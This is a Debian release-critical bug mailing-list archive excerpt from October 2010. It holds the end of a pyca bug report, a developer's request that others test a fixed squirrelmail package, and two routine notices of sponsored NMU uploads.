-- Configuration Files:
/etc/pyca/cacert_AuthCerts.cnf changed [not included]
/etc/pyca/cacert_CodeSigning.cnf changed [not included]
/etc/pyca/cacert_EmailCerts.cnf changed [not included]
/etc/pyca/cacert_Root.cnf changed [not included]
/etc/pyca/cacert_ServerCerts.cnf changed [not included]
/etc/pyca/openssl.cnf changed [not included]
/etc/pyca/ssl_server_csr.cnf changed [not included]

-- no debconf information



-- 
To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org



Bug#593465: Try this fixed package

2010-10-19 Thread Micah Anderson

I've uploaded a package that includes my fix, it seems to be working
well for me. If other people on this bug report can try it to see if it
works for them, that would be helpful.

you can get the package here:

http://people.debian.org/~micah/squirrelmail_1.4.15-4+lenny4_all.deb

note: source packages are in the same directory.

micah

-- 



pgpwLbgtiIOd0.pgp
Description: PGP signature


Bug#571220: sponsored NMU uploaded to delayed/2

2010-10-19 Thread tony mancill
Notification that an NMU addressing this bug has been uploaded to
delayed/2.  Please contact me if there is a pending maintainer upload
and the NMU should be removed from the queue.

Thank you,
tony



signature.asc
Description: OpenPGP digital signature


Bug#599833: sponsored NMU uploaded to delayed/2

2010-10-19 Thread tony mancill
Notification that an NMU addressing this bug has been uploaded to
delayed/2.  Please contact me if there is a pending maintainer upload
and the NMU should be removed from the queue.

Thank you,
tony



signature.asc
Description: OpenPGP digital signature